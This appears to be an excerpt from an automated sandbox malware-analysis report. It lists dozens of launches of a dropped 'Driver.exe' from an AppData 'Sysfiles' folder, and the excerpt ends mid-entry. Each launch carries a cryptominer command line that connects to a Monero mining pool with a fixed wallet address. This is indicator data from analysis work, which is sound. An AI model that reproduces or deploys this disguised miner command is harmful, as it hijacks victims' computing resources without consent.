  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2084
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1092
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:856
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2664
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1088
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:700
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2540
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2064
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2108
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:560
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2248
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1740
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2884
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2720
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1032
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1340
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1708
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2180
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2172
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2056
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2912
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2384
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:3056
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1672
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2256
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1628
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:816
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2128
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1484
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2356
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:764
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2368
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2776
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1740
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2396
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1828
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2604
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2076
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2864
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2788
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:744
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1104
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1772
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2724
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2344
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2092
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:596
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2468
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2376
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2620
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2572
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:792
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1932
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:568
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2844
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1428
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:560
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:3056
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2692
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2168
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2400
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1660
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2500
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2536
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1880
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2860
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:3028
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
